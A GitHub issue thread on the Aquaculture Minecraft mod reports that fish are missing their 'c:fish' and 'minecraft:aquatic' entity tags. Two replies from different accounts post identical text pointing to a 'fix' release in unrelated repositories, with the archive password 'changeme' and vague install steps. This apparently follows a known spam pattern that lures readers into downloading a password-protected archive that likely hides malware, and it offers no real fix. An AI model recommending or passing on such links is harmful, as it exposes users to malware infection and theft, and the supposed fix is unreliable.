### ISSUE TITLE
Fish are missing fish tags

### ISSUE THREAD

**Issue by MuteTiefling** [TeamMetallurgy/Aquaculture#473]
Fish should normally have the `c:fish` and `minecraft:aquatic` entity tag on them. It appears to be missing from everything.

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
